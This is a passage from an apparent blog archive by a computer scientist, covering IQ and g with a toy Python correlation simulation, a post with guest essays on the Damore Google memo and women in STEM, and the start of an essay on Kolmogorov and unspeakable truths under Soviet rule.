Richard Feynman famously scored only 124 on a childhood IQ test—above average, but below the cutoff for most schools’ “gifted and talented” programs. After he won the Nobel Prize in Physics, he reportedly said that the prize itself was no big deal; what he was really proud of was to have received one despite an IQ of merely 124. If so, then it seems to me that I can feel equally proud, to have completed a computer science PhD at age 22, become a tenured MIT professor, etc. etc. despite a much lower IQ even than Feynman’s.

But seriously: how do we explain Feynman’s score? Well, when you read IQ enthusiasts, you find what they really love is not IQ itself, but rather “g”, a statistical construct derived via factor analysis: something that positively correlates with just about every measurable intellectual ability, but that isn’t itself directly measurable (at least, not by any test yet devised). An IQ test is merely one particular instrument that happens to correlate well with g—not necessarily the best one for all purposes. The SAT also correlates with g—indeed, almost as well as IQ tests themselves do, despite the idea (or pretense?) that the SAT measures “acquired knowledge.” These correlations are important, but they allow for numerous and massive outliers. So, not for the first time, I find myself in complete agreement with Scott Alexander, when he advises people to stop worrying. 
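The picture of "strong correlations, but with numerous and massive outliers" is easy to see in a toy simulation. The sketch below is a cartoon, not real psychometrics: every distribution and noise level is invented purely for illustration. A latent ability drives three noisy observables (an IQ-like proxy, a more direct "try studying the subject" signal, and an eventual outcome); the proxy correlates strongly with the outcome, yet individual outliers abound, and once you hold the direct signal fixed, the proxy tells you little extra.

```python
import random
import statistics

random.seed(0)

# Toy model -- every number here is invented for illustration only.
# A latent ability "g" drives three noisy observables: an IQ-like proxy,
# a direct "how did studying the subject go" signal, and a final outcome.
N = 100_000
people = []
for _ in range(N):
    g = random.gauss(0, 1)
    iq = g + random.gauss(0, 0.8)       # noisy proxy of g
    study = g + random.gauss(0, 0.3)    # much more direct signal
    outcome = g + random.gauss(0, 0.5)  # eventual success
    people.append((iq, study, outcome))

def corr(xs, ys):
    """Pearson correlation of two equal-length sequences."""
    mx, my = statistics.fmean(xs), statistics.fmean(ys)
    cov = statistics.fmean((x - mx) * (y - my) for x, y in zip(xs, ys))
    return cov / (statistics.pstdev(xs) * statistics.pstdev(ys))

iqs, studies, outcomes = zip(*people)
print("corr(IQ, outcome):   ", round(corr(iqs, outcomes), 2))
print("corr(study, outcome):", round(corr(studies, outcomes), 2))

# "Numerous and massive outliers": even with a strong correlation,
# many people with top-decile proxy scores land below the median outcome.
iq_cut = sorted(iqs)[int(0.9 * N)]
out_med = sorted(outcomes)[N // 2]
misses = sum(1 for iq, st, out in people if iq >= iq_cut and out < out_med)
print(f"top-decile IQ but below-median outcome: {misses} of {N // 10}")

# Condition on the direct signal: among people whose "study" signal
# falls in a narrow band, the proxy barely predicts the outcome anymore.
band = [(iq, out) for iq, st, out in people if 0.9 < st < 1.1]
b_iq, b_out = zip(*band)
print("corr(IQ, outcome | study fixed):", round(corr(b_iq, b_out), 2))
```

With these made-up parameters, the marginal IQ-outcome correlation comes out strong while the correlation within a fixed band of the direct signal is far weaker, which is the "start studying and see how you do" point in miniature.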
We can uphold every statistical study that’s ever been done correlating IQ with other variables, while still affirming that fretting about your own low IQ score is almost as silly as fretting that you must be dumb because your bookshelf is too empty (a measurable variable that also presumably correlates with g). More to the point: if you want to know, let’s say, whether you can succeed as a physicist, then surely the best way to find out is to start studying physics and see how well you do. That will give you a much more accurate signal than a gross consumer index like IQ will—and conditioned on that signal, I’m guessing that your IQ score will provide almost zero additional information. (Though then again, what would a guy with a 106 IQ know about such things?)

### What I believe II (ft. Sarah Constantin and Stacey Jeffery)

Tuesday, August 15th, 2017

Unrelated Update: To everyone who keeps asking me about the “new” P≠NP proof: I’d again bet $200,000 that the paper won’t stand, except that the last time I tried that, it didn’t achieve its purpose, which was to get people to stop asking me about it. So: please stop asking, and if the thing hasn’t been refuted by the end of the week, you can come back and tell me I was a closed-minded fool.
In my post “The Kolmogorov Option,” I tried to step back from current controversies, and use history to reflect on the broader question of how nerds should behave when their penchant for speaking unpopular truths collides head-on with their desire to be kind and decent and charitable, and to be judged as such by their culture. I was gratified to get positive feedback about this approach from men and women all over the ideological spectrum.
However, a few people who I like and respect accused me of “dogwhistling.” They warned, in particular, that if I wouldn’t just come out and say what I thought about the James Damore Google memo thing, then people would assume the very worst—even though, of course, my friends themselves knew better.
So in this post, I’ll come out and say what I think. But first, I’ll do something even better: I’ll hand the podium over to two friends, Sarah Constantin and Stacey Jeffery, both of whom were kind enough to email me detailed thoughts in response to my Kolmogorov post.
Sarah Constantin completed her PhD in math at Yale. I don’t think I’ve met her in person yet, but we have a huge number of mutual friends in the so-called “rationalist community.” Whenever Sarah emails me about something I’ve written, I pay extremely close attention, because I have yet to read a single thing by her that wasn’t full of insight and good sense. I strongly urge anyone who likes her beautiful essay below to check out her blog, which is called Otium.
Sarah Constantin’s Commentary:
I’ve had a women-in-STEM essay brewing in me for years, but I’ve been reluctant to actually write publicly on the topic for fear of stirring up a firestorm of controversy. On the other hand, we seem to be at a cultural inflection point on the issue, especially in the wake of the leaked Google memo, and other people are already scared to speak out, so I think it’s past time for me to put my name on the line, and Scott has graciously provided me a platform to do so.
I’m a woman in tech myself. I’m a data scientist doing machine learning for drug discovery at Recursion Pharmaceuticals, and before that I was a data scientist at Palantir. Before that I was a woman in math — I got my PhD from Yale, studying applied harmonic analysis. I’ve been in this world all my adult life, and I obviously don’t believe my gender makes me unfit to do the work.
I’m also not under any misapprehension that I’m some sort of exception. I’ve been mentored by Ingrid Daubechies and Maryam Mirzakhani (the first female Fields Medalist, who died tragically young last month). I’ve been lucky enough to work with women who are far, far better than me. There are a lot of remarkable women in math and computer science — women just aren’t the majority in those fields. But “not the majority” doesn’t mean “rare” or “unknown.”
I even think diversity programs can be worthwhile. I went to the Institute for Advanced Study’s Women and Math Program, which would be an excellent graduate summer school even if it weren’t all-female, and taught at its sister program for high school girls, which likewise is a great math camp independent of the gender angle. There’s a certain magic, if you’re in a male-dominated field, of once in a while being in a room full of women doing math, and I hope that everybody gets to have that experience once.
But (you knew the “but” was coming), I think the Google memo was largely correct, and the way people conventionally talk about women in tech is wrong.
Let’s look at some of his claims. From the beginning of the memo:
• Google’s political bias has equated the freedom from offense with psychological safety, but shaming into silence is the antithesis of psychological safety.
• This silencing has created an ideological echo chamber where some ideas are too sacred to be honestly discussed.
• The lack of discussion fosters the most extreme and authoritarian elements of this ideology.
• Extreme: all disparities in representation are due to oppression
• Authoritarian: we should discriminate to correct for this oppression
Okay, so there’s a pervasive assumption that any deviation from 50% representation of women in technical jobs is a.) due to oppression, and b.) ought to be corrected by differential hiring practices. I think it is basically true that people widely believe this, and that people can lose their jobs for openly contradicting it (as James Damore, the author of the memo, did). I have heard people I work with advocating hiring quotas for women (i.e. explicitly earmarking a number of jobs for women candidates only). It’s not a strawman.
Then, Damore disagrees with this assumption:
• Differences in distributions of traits between men and women may in part explain why we don’t have 50% representation of women in tech and leadership. Discrimination to reach equal representation is unfair, divisive, and bad for business.
Again, I agree with Damore. Note that this doesn’t mean that I must believe that sexism against women isn’t real and important (I’ve heard enough horror stories to be confident that some work environments are toxic to women). It doesn’t even mean that I must be certain that the different rates of men and women in technical fields are due to genetics. I’m very far from certain, and I’m not an expert in psychology. I don’t think I can do justice to the science in this post, so I’m not going to cover the research literature.
But I do think it’s irresponsible to assume a priori that there are no innate sex differences that might explain what we see. It’s an empirical matter, and a topic for research, not dogma.
Moreover, I think discrimination on the basis of sex to reach equal representation is unfair and unproductive. It’s unfair, because it’s not meritocratic. You’re not choosing the best human for the job regardless of gender.
I think women might actually benefit from companies giving genuine meritocracy a chance. “Blind” auditions (in which the evaluator doesn’t see the performer) gave women a better chance of landing orchestra jobs; apparently, orchestras were prejudiced against female musicians, and the blinding canceled out that prejudice. Google’s own research has actually shown that the single best predictor of work performance is a work sample — testing candidates with a small project similar to what they’d do on the job. Work samples are easy to anonymize to reduce gender bias, and they’re more effective than traditional interviews, where split-second first impressions usually decide who gets hired, but don’t correlate at all with job performance. A number of tech companies have switched to work samples as part of their interview process. I used work samples myself when I was hiring for a startup, just because they seemed more accurate at predicting who’d be good at the job; entirely without intending to, I got a 50% gender ratio. If you want to reduce gender bias in tech, it’s worth at least considering blinded hiring via work samples.
Moreover, thinking about “representation” in science and technology reflects underlying assumptions that I think are quite dangerous.
You expect interest groups to squabble over who gets a piece of the federal budget. In politics, people will band together in blocs, and try to get the biggest piece of the spoils they can. “Women should get such-and-such a percent of tech jobs” sounds precisely like this kind of politicking; women are assumed to be a unified bloc who will vote together, and the focus is on what size chunk they can negotiate for themselves. If a tech job (or a university position) were a cushy sinecure, a ticket to privilege, and nothing more, you might reasonably ask “how come some people get more goodies than others? Isn’t meritocracy just an excuse to restrict the goodies to your preferred group?”
Again, this is not a strawman. Here’s one Vox response to the memo, whose author states explicitly that she believes women are a unified bloc:
The manifesto’s sleight-of-hand delineation between “women, on average” and the actual living, breathing women who have had to work alongside this guy failed to reassure many of those women — and failed to reassure me. That’s because the manifesto’s author overestimated the extent to which women are willing to be turned against their own gender.
Speaking for myself, it doesn’t matter to me how soothingly a man coos that I’m not like most women, when those coos are accompanied by misogyny against most women. I am a woman. I do not stop being one during the parts of the day when I am practicing my craft. There can be no realistic chance of individual comfort for me in an environment where others in my demographic categories (or, really, any protected demographic categories) are subjected to skepticism and condescension.
She can’t be comfortable unless everybody in any protected demographic category — note that this is a legal, governmental category — is given the benefit of the doubt? That’s a pretty collectivist commitment!
Or, look at Piper Harron, an assistant professor in math who blogged on the American Mathematical Society’s website that universities should simply “stop hiring white cis men”, and explicitly says “If you are on a hiring committee, and you are looking at applicants and you see a stellar white male applicant, think long and hard about whether your department needs another white man. You are not hiring a researching robot who will output papers from a dark closet. You are hiring an educator, a role model, a spokesperson, an advisor, a committee person … There is no objectivity. There is no meritocracy.”
Piper Harron reflects an extreme, of course, but she’s explicitly saying, on America’s major communication channel for and by mathematicians, that whether you get to work in math should not be based on whether you’re actually good at math. For her, it’s all politics. Life itself is political, and therefore a zero-sum power struggle between groups.
But most of us, male or female, didn’t fall in love with science and technology for that. Science is the mission to explore and understand our universe. Technology is the project of expanding human power to shape that universe. What we do towards those goals will live longer than any “protected demographic category”, any nation, any civilization. We know how the Babylonians mapped the stars.
Women deserve an equal chance at a berth on the journey of exploration not because they form a political bloc but because some of them are discoverers and can contribute to the human mission.
Maybe, in a world corrupted by rent-seeking, the majority of well-paying jobs have some element of unearned privilege; perhaps almost all of us got at least part of our salaries by indirectly expropriating someone who had as good a right to it as us.
But that’s not a good thing, and that’s not what we hope for science and engineering to be, and I truly believe that this is not the inevitable fate of the human race — that we can only squabble over scraps, and never create.
I’ve seen creation, and I’ve seen discovery. I know they’re real.
I care a lot more about whether my company achieves its goal of curing 100 rare diseases in 10 years than about the demographic makeup of our team. We have an actual mission; we are trying to do something beyond collecting spoils.
Do I rely on brilliant work by other women every day? I do. My respect for myself and my female colleagues is not incompatible with primarily caring about the mission.
Am I “turning against my own gender” because I see women as individuals first? I don’t think so. We’re half the human race, for Pete’s sake! We’re diverse. We disagree. We’re human.
When you think of “women-in-STEM” as a talking point on a political agenda, you mention Ada Lovelace and Grace Hopper in passing, and move on to talking about quotas. When you think of women as individuals, you start to notice how many genuinely foundational advances were made by women — just in my own field of machine learning, Adele Cutler co-invented random forests, Corinna Cortes co-invented support vector machines, and Fei-Fei Li created the famous ImageNet benchmark dataset that started a revolution in image recognition.
As a child, my favorite book was Carl Sagan’s Contact, a novel about Ellie Arroway, an astronomer loosely based on his wife Ann Druyan. The name is not an accident; like the title character in Sinclair Lewis’ Arrowsmith, Ellie is a truth-seeking scientist who battles corruption, anti-intellectualism, and blind prejudice. Sexism is one of the challenges she faces, but the essence of her life is about wonder and curiosity. She’s what I’ve always tried to become.
I hope that, in seeking to encourage the world’s Ellies in science and technology, we remember why we’re doing that in the first place. I hope we remember humans are explorers.
Now let’s hear from another friend who wrote to me recently, and who has a slightly different take. Stacey Jeffery is a quantum computing theorist at one of my favorite research centers, CWI in Amsterdam. She completed her PhD at University of Waterloo, and has done wonderful work on quantum query complexity and other topics close to my heart. When I was being viciously attacked in the comment-171 affair, Stacey was one of the first people to send me a note of support, and I’ve never forgotten it.
Stacey Jeffery’s Commentary
I don’t think Google was right to fire Damore. This makes me a minority among people with whom I have discussed this issue. Hopefully some people come out in the comments in support of the other position, so it’s not just me presenting that view. The main argument I encountered was that what he said just sounded way too sexist for Google to put up with. I agree with part of that: it did sound sexist to me. In fact it also sounded racist to me. But that’s not because he necessarily said anything actually sexist or actually racist, but because he said the kinds of things that you usually only hear from sexist people, and in particular, the kind of sexist people who are also racist. I’m very unlikely to try to pursue further interaction with a person who says these kinds of things for those reasons, but I think firing him for what he said between the lines sets a very bad precedent. It seems to me he was fired for associating himself with the wrong ideas, and it does feel a bit like certain subjects are not up for rational discussion. If Google wants an open environment, where employees can feel safe discussing company policy, I don’t think this contributes to that. If they want their employees, and the world, to think that they aim for diversity because it’s the most rational course of action to achieve their overall objectives, rather than because it serves some secret agenda, like maintaining a PC public image, then I don’t think they’ve served that cause either. Personally, this irritates me the most, because I feel they have damaged the image for a cause I feel strongly about.
My position is independent of the validity of Damore’s attempt at scientific argument, which is outside my area of expertise. I personally don’t think it’s very productive for non-social-scientists to take authoritative positions on social science issues, especially ones that appear to be controversial within the field (but I say this as a layperson). This may include some of the other commentary in this blog post, which I have not yet read, and might even extend to Scott’s decision to comment on this issue at all (but this bridge was crossed in the previous blog post). However, I think one of the reasons that many of us do this is that the burden of solving the problem of too few women in STEM is often placed on us. Some people in STEM feel they are blamed for not being welcoming enough to women (in fact, in my specific field, it’s my experience that the majority of people are very sympathetic). Many scientific funding applications even ask applicants how they plan to address the issue of diversity, as if they should be the ones to come up with a solution for this difficult problem that nobody knows the answer to, and is not even within their expertise. So it’s not surprising when these same people start to think about and form opinions on these social science issues. Obviously, we working in STEM have valuable insight into how we might encourage women to pursue STEM careers, and we should be pushed to think about this, but we don’t have all the answers (and maybe we should remember that the next time we consider authoring an authoritative memo on the subject).
Scott’s Mansplaining Commentary
I’m incredibly grateful to Sarah and Stacey for sharing their views. Now it’s time for me to mansplain my own thoughts in light of what they said. Let me start with a seven-point creed.
1. I believe that science and engineering, both in academia and in industry, benefit enormously from contributions from people of every ethnic background and gender identity. This sort of university-president-style banality shouldn’t even need to be said, but in a world where the President of the US criticizes neo-Nazis only under extreme pressure from his own party, I suppose it does.
2. I believe that there’s no noticeable difference in average ability between men and women in STEM fields—or if there’s some small disparity, for all I know the advantage goes to women. I have enough Sheldon Cooper in me that, if this hadn’t been my experience, I’d probably let it slip that it hadn’t been, but it has been. When I taught 6.045 (undergrad computability and complexity) at MIT, women were only 20% or so of the students, but for whatever reasons they were wildly overrepresented among the top students.
3. I believe that women in STEM face obstacles that men don’t. These range from the sheer awkwardness of sometimes being the only woman in a room full of guys, to challenges related to pregnancy and childcare, to actual belittlement and harassment. Note that, even if men in STEM fields are no more sexist on average than men in other fields—or are less sexist, as one might expect from their generally socially liberal views and attitudes—the mere fact of the gender imbalance means that women in STEM will have many more opportunities to be exposed to whatever sexists there are. This puts a special burden on us to create a welcoming environment for women.
4. Given that we know that gender gaps in interest and inclination appear early in life, I believe in doing anything we can to encourage girls’ interest in STEM fields. Trust me, my four-year-old daughter Lily wishes I didn’t believe so fervently in working with her every day on her math skills.
5. I believe that gender diversity is valuable in itself. It’s just nicer, for men and women alike, to have a work environment with many people of both sexes—especially if (as is often the case in STEM) so much of our lives revolves around our work. I think that affirmative action for women, women-only scholarships and conferences, and other current efforts to improve gender diversity can all be defended and supported on that ground alone.
6. I believe that John Stuart Mill’s The Subjection of Women is one of the masterpieces of history, possibly the highest pinnacle that moral philosophy has ever reached. Everyone should read it carefully and reflect on it if they haven’t already.
7. I believe it’s a tragedy that the current holder of the US presidency is a confessed sexual predator, who’s full of contempt not merely for feminism, but for essentially every worthwhile human value. I believe those of us on the “pro-Enlightenment side” now face the historic burden of banding together to stop this thug by every legal and peaceful means available. I believe that, whenever the “good guys” tear each other down in internecine warfare—e.g. “nerds vs. feminists”—it represents a wasted opportunity and an unearned victory for the enemies of progress.
OK, now for the part that might blow some people’s minds. I hold that every single belief above is compatible with what James Damore wrote in his now-infamous memo—at least, if we’re talking about the actual words in it. In some cases, Damore even makes the above points himself. In particular, there’s nothing in what he wrote about female Googlers being less qualified on average than male Googlers, or being too neurotic to code, or anything like that: the question at hand is just why there are fewer women in these positions, and that in turn becomes a question about why there are fewer women earlier in the CS pipeline. Reasonable people need not agree about the answers to those questions, or regard them as known or obvious, to see that the failure to make this one elementary distinction, between quality and quantity, already condemns 95% of Damore’s attackers as not having read or understood what he wrote.
Let that be the measure of just how terrifyingly efficient the social-media outrage machine has become at twisting its victims’ words to fit a clickbait narrative—a phenomenon with which I happen to be personally acquainted. Strikingly, it seems not to make the slightest difference if (as in this case) the original source text is easily available to everyone.
Still, while most coverage of Damore’s memo was depressing in its monotonous incomprehension, dissent was by no means confined to the right-wingers eager to recruit Damore to their side. Peter Singer—the legendary leftist moral philosopher, and someone whose fearlessness and consistency I’ve always admired whether I’ve agreed with him or not—wrote a powerful condemnation of Google’s decision to fire Damore. Scott Alexander was brilliant as usual in picking apart bad arguments. Megan McArdle drew on her experiences to illustrate some of Damore’s contentions. Steven Pinker tweeted that Damore’s firing “makes [the] job of anti-Trumpists harder.”
Like Peter Singer, and also like Sarah Constantin and Stacey Jeffery above, I have no plans to take any position on biological differences in male and female inclinations and cognitive styles, and what role (if any) such differences might play in 80% of Google engineers being male—or, for that matter, what role they might play in 80% of graduating veterinarians now being female, or other striking gender gaps. I decline to take a position not only because I’m not an expert, but also because, as Singer says, doing so isn’t necessary to reach the right verdict about Damore’s firing. It suffices to note that the basic thesis being discussed—namely, that natural selection doesn’t stop at the neck, and that it’s perfectly plausible that it acted differently on women and men in ways that might help explain many of the population-level differences that we see today—can also be found in, for example, The Blank Slate by Steven Pinker, and other mainstream works by some of the greatest thinkers alive.
And therefore I say: if James Damore deserves to be fired from Google, for treating evolutionary psychology as potentially relevant to social issues, then Steven Pinker deserves to be fired from Harvard for the same offense.
Yes, I realize that an employee of a private company is different from a tenured professor. But I don’t see why it’s relevant here. For if someone really believes that mooting the hypothesis of an evolutionary reason for average differences in cognitive styles between men and women, is enough by itself to create a hostile environment for women—well then, why should tenure be a bar to firing, any more than it is in cases of sexual harassment?
But the reductio needn’t stop there. It seems to me that, if Damore deserves to be fired, then so do the 56% of Googlers who said in a poll that they opposed his firing. For isn’t that 56% just as responsible for maintaining a hostile environment as Damore himself was? (And how would Google find out which employees opposed the firing? Well, if there’s any company on earth that could…) Furthermore, after those 56% of Googlers are fired, any of the remaining 44% who think the 56% shouldn’t have been fired should be fired as well! And so on iteratively, until only an ideologically reliable core remains, which might or might not be the empty set.
OK, but while the wider implications of Damore’s firing have frightened and depressed me all week, as I said, I depart from Damore on the question of affirmative action and other diversity policies. Fundamentally, what I want is a sort of negotiated agreement or bargain, between STEM nerds and the wider culture in which they live. The agreement would work like this: STEM nerds do everything they can to foster diversity, including by creating environments that are welcoming for women, and by supporting affirmative action, women-only scholarships and conferences, and other diversity policies. The STEM nerds also agree never to talk in public about possible cognitive-science explanations for gender disparities in which careers people choose, or overlapping bell curves, or anything else potentially inflammatory. In return, just two things:
1. Male STEM nerds don’t regularly get libelled as misogynist monsters, who must be scaring all the women away with their inherently gross, icky, creepy, discriminatory brogrammer maleness.
2. The fields beloved by STEM nerds are suffered to continue to exist, rather than getting destroyed and rebuilt along explicitly ideological lines, as already happened with many humanities and social science fields.
So in summary, neither side advances its theories about the causes of gender gaps; both sides simply agree that there are more interesting topics to explore. In concrete terms, the social-justice side gets to retain 100% of what it has now, or maybe even expand it. And all it has to offer in exchange is "R-E-S-P-E-C-T"! Like, don't smear and shame male nerds as a class, or nerdy disciplines themselves, for gender gaps that the male nerds would be as happy as anybody to see eradicated.
The trouble is that, fueled by outrage-fests on social media, I think the social-justice side is currently failing to uphold its end of this imagined bargain. Nearly every day the sun rises to yet another thinkpiece about the toxic “bro culture” of Silicon Valley: a culture so uniquely and incorrigibly misogynist, it seems, that it still intentionally keeps women out, even after law and biology and most other white-collar fields have achieved or exceeded gender parity, their own “bro cultures” notwithstanding. The trouble with this slander against male STEM nerds, besides its fundamental falsity (which Scott Alexander documented), is that it puts the male nerds into an impossible position. For how can they refute the slander without talking about other possible explanations for fields like CS being 80% male, which is the very thing we all know they’re not supposed to talk about?
In Europe, in the Middle Ages, the Church would sometimes enjoy forcing the local Jews into “disputations” about whose religion was the true one. At these events, a popular tactic on the Church’s side was to make statements that the Jews couldn’t possibly answer without blaspheming the name of Christ—which, of course, could lead to the Jews’ expulsion or execution if they dared it.
Maybe I have weird moral intuitions, but it’s hard for me to imagine a more contemptible act of intellectual treason, than deliberately trapping your opponents between surrender and blasphemy. I’d actually rather have someone force me into one or the other, than make me choose, and thereby make me responsible for whichever choice I made. So I believe the social-justice left would do well to forswear this trapping tactic forever.
Ironically, I suspect that in the long term, doing so would benefit no entity more than the social-justice left itself. If I had to steelman, in one sentence, the argument that in the space of one year propelled the “alt-right” from obscurity in dark and hateful corners of the Internet, to the improbable and ghastly ascent of Donald Trump and his white-nationalist brigade to the most powerful office on earth, the argument would be this:
If the elites, the technocrats, the “Cathedral”-dwellers, were willing to lie to the masses about humans being blank slates—and they obviously were—then why shouldn’t we assume that they also lied to us about healthcare and free trade and guns and climate change and everything else?
We progressives deluded ourselves that we could permanently shame our enemies into silence, on pain of sexism, racism, xenophobia, and other blasphemies. But the “victories” won that way were hollow and illusory, and the crumbling of the illusion brings us to where we are now: with a vindictive, delusional madman in the White House who has a non-negligible chance of starting a nuclear war this week.
The Enlightenment was a specific historical period in 18th-century Europe. But the term can also be used much more broadly, to refer to every trend in human history that’s other than horrible. Seen that way, the Enlightenment encompasses the scientific revolution, the abolition of slavery, the decline of all forms of violence, the spread of democracy and literacy, and the liberation of women from domestic drudgery to careers of their own choosing. The invention of Google, which made the entire world’s knowledge just a search bar away, is now also a permanent part of the story of the Enlightenment.
I fantasize that, within my lifetime, the Enlightenment will expand further to tolerate a diversity of cognitive styles—including people on the Asperger’s and autism spectrum, with their penchant for speaking uncomfortable truths—as well as a diversity of natural abilities and inclinations. Society might or might not get the “demographically correct” percentage of Ellie Arroways—Ellie might decide to become a doctor or musician rather than an astronomer, and that’s fine too—but most important, it will nurture all the Ellie Arroways that it gets, all the misfits and explorers of every background. I wonder whether, while disagreeing on exactly what’s meant by it, all parties to this debate could agree that diversity represents a next frontier for the Enlightenment.
Comment Policy: Any comment, from any side, that attacks people rather than propositions will be deleted. I don’t care if the comment also makes useful points: if it contains a single ad hominem, it’s out.
As it happens, I’m at a quantum supremacy workshop in Bristol, UK right now—yeah, yeah, I’m a closet supremacist after all, hur hur—so I probably won’t participate in the comments until later.
### The Kolmogorov option
Tuesday, August 8th, 2017
Andrey Nikolaevich Kolmogorov was one of the giants of 20th-century mathematics. I’ve always found it amazing that the same man was responsible both for establishing the foundations of classical probability theory in the 1930s, and also for co-inventing the theory of algorithmic randomness (a.k.a. Kolmogorov complexity) in the 1960s, which challenged the classical foundations, by holding that it is possible after all to talk about the entropy of an individual object, without reference to any ensemble from which the object was drawn. Incredibly, going strong into his eighties, Kolmogorov then pioneered the study of “sophistication,” which amends Kolmogorov complexity to assign low values both to “simple” objects and “random” ones, and high values only to a third category of objects, which are “neither simple nor random.” So, Kolmogorov was at the vanguard of the revolution, counter-revolution, and counter-counter-revolution.
But that doesn’t even scratch the surface of his accomplishments: he made fundamental contributions to topology and dynamical systems, and together with Vladimir Arnold, solved Hilbert’s thirteenth problem, showing that any multivariate continuous function can be written as a composition of continuous functions of two variables. He mentored an awe-inspiring list of young mathematicians, whose names (besides Arnold) include Dobrushin, Dynkin, Gelfand, Martin-Löf, Sinai, and in theoretical computer science, our own Leonid Levin. If that wasn’t enough, during World War II Kolmogorov applied his mathematical gifts to artillery problems, helping to protect Moscow from German bombardment.
Kolmogorov was private in his personal and political life, which might have had something to do with being gay, at a time and place when that was in no way widely accepted. From what I’ve read—for example, in Gessen’s biography of Perelman—Kolmogorov seems to have been generally a model of integrity and decency. He established schools for mathematically gifted children, which became jewels of the Soviet Union; one still reads about them with awe. And at a time when Soviet mathematics was convulsed by antisemitism—with students of Jewish descent excluded from the top math programs for made-up reasons, sent instead to remote trade schools—Kolmogorov quietly protected Jewish researchers.
OK, but all this leaves a question. Kolmogorov was a leading and admired Soviet scientist all through the era of Stalin’s purges, the Gulag, the KGB, the murders and disappearances and forced confessions, the show trials, the rewritings of history, the allies suddenly denounced as traitors, the tragicomedy of Lysenkoism. Anyone as intelligent, individualistic, and morally sensitive as Kolmogorov would obviously have seen through the lies of his government, and been horrified by its brutality. So then why did he utter nary a word in public against what was happening?
As far as I can tell, the answer is simply: because Kolmogorov knew better than to pick fights he couldn’t win. He judged that he could best serve the cause of truth by building up an enclosed little bubble of truth, and protecting that bubble from interference by the Soviet system, and even making the bubble useful to the system wherever he could—rather than futilely struggling to reform the system, and simply making martyrs of himself and all his students for his trouble.
There’s a saying of Kolmogorov, which associates wisdom with keeping your mouth shut:
“Every mathematician believes that he is ahead of the others. The reason none state this belief in public is because they are intelligent people.”
There’s also a story that Kolmogorov loved to tell about himself, which presents math as a sort of refuge from the arbitrariness of the world: he said that he once studied to become a historian, but was put off by the fact that historians demanded ten different proofs for the same proposition, whereas in math, a single proof suffices.
There was also a dark side to Kolmogorov’s political quietism. In 1936, Kolmogorov joined other mathematicians in testifying against his former mentor, Nikolai Luzin, in the so-called Luzin affair. By many accounts, he did this because the police blackmailed him, by threatening to reveal his homosexual relationship with Pavel Aleksandrov. On the other hand, while he was never foolish enough to take on Lysenko directly, Kolmogorov did publish a paper in 1940 courageously supporting Mendelian genetics.
It seems likely that in every culture, there have been truths, which moreover everyone knows to be true on some level, but which are so corrosive to the culture’s moral self-conception that one can’t assert them, or even entertain them seriously, without (in the best case) being ostracized for the rest of one’s life. In the USSR, those truths were the ones that undermined the entire communist project: for example, that humans are not blank slates; that Mendelian genetics is right; that Soviet collectivized agriculture was a humanitarian disaster. In our own culture, those truths are—well, you didn’t expect me to say, did you? 🙂
I’ve long been fascinated by the psychology of unspeakable truths. Like, for any halfway perceptive person in the USSR, there must have been an incredible temptation to make a name for yourself as a daring truth-teller: so much low-hanging fruit! So much to say that’s correct and important, and that best of all, hardly anyone else is saying!
But then one would think better of it. It’s not as if, when you speak a forbidden truth, your colleagues and superiors will thank you for correcting their misconceptions. Indeed, it’s not as if they didn’t already know, on some level, whatever you imagined yourself telling them. In fact it’s often because they fear you might be right that the authorities see no choice but to make an example of you, lest the heresy spread more widely. One corollary is that the more reasonably and cogently you make your case, the more you force the authorities’ hand.
But what’s the inner psychology of the authorities? For some, it probably really is as cynical as the preceding paragraph makes it sound. But for most, I doubt that. I think that most authorities simply internalize the ruling ideology so deeply that they equate dissent with sin. So in particular, the better you can ground your case in empirical facts, the craftier and more conniving a deceiver you become in their eyes, and hence the more virtuous they are for punishing you. Someone who’s arrived at that point is completely insulated from argument: absent some crisis that makes them reevaluate their entire life, there’s no sense in even trying. The question of whether or not your arguments have merit won’t even get entered upon, nor will the authority ever be able to repeat back your arguments in a form you’d recognize—for even repeating the arguments correctly could invite accusations of secretly agreeing with them. Instead, the sole subject of interest will be you: who you think you are, what your motivations were to utter something so divisive and hateful. And you have as good a chance of convincing authorities of your benign motivations as you’d have of convincing the Inquisition that, sure, you’re a heretic, but the good kind of heretic, the kind who rejects the divinity of Jesus but believes in niceness and tolerance and helping people. To an Inquisitor, “good heretic” doesn’t parse any better than “round square,” and the very utterance of such a phrase is an invitation to mockery. If the Inquisition had had Twitter, its favorite sentence would be “I can’t even.”
If it means anything to be a lover of truth, it means that anytime society finds itself stuck in one of these naked-emperor equilibriums—i.e., an equilibrium with certain facts known to nearly everyone, but severe punishments for anyone who tries to make those facts common knowledge—you hope that eventually society climbs its way out. But crucially, you can hope this while also realizing that, if you tried singlehandedly to change the equilibrium, it wouldn’t achieve anything good for the cause of truth. If iconoclasts simply throw themselves against a ruling ideology one by one, they can be picked off as easily as tribesmen charging a tank with spears, and each kill will only embolden the tank-gunners still further. The charging tribesmen don’t even have the assurance that, if truth ultimately does prevail, then they’ll be honored as martyrs: they might instead end up like Ted Nelson babbling about hypertext in 1960, or H.C. Pocklington yammering about polynomial-time algorithms in 1917, nearly forgotten by history for being too far ahead of their time.
Does this mean that, like Winston Smith, the iconoclast simply must accept that 2+2=5, and that a boot will stamp on a human face forever? No, not at all. Instead the iconoclast can choose what I think of as the Kolmogorov option. This is where you build up fortresses of truth in places the ideological authorities don’t particularly understand or care about, like pure math, or butterfly taxonomy, or irregular verbs. You avoid a direct assault on any beliefs your culture considers necessary for it to operate. You even seek out common ground with the local enforcers of orthodoxy. Best of all is a shared enemy, and a way your knowledge and skills might be useful against that enemy. For Kolmogorov, the shared enemy was the Nazis; for someone today, an excellent choice might be Trump, who’s rightly despised by many intellectual factions that spend most of their time despising each other. Meanwhile, you wait for a moment when, because of social tectonic shifts beyond your control, the ruling ideology has become fragile enough that truth-tellers acting in concert really can bring it down. You accept that this moment of reckoning might never arrive, or not in your lifetime. But even if so, you could still be honored by future generations for building your local pocket of truth, and for not giving falsehood any more aid or comfort than was necessary for your survival.
When it comes to the amount of flak one takes for defending controversial views in public under one’s own name, I defer to almost no one. For anyone tempted, based on this post, to call me a conformist or coward: how many times have you been denounced online, and from how many different corners of the ideological spectrum? How many people have demanded your firing? How many death threats have you received? How many threatened lawsuits? How many comments that simply say “kill yourself kike” or similar? Answer and we can talk about cowardice.
But, yes, there are places even I won’t go, hills I won’t die on. Broadly speaking:
• My Law is that, as a scientist, I’ll hold discovering and disseminating the truth to be a central duty of my life, one that overrides almost every other value. I’ll constantly urge myself to share what I see as the truth, even if it’s wildly unpopular, or makes me look weird, or is otherwise damaging to me.
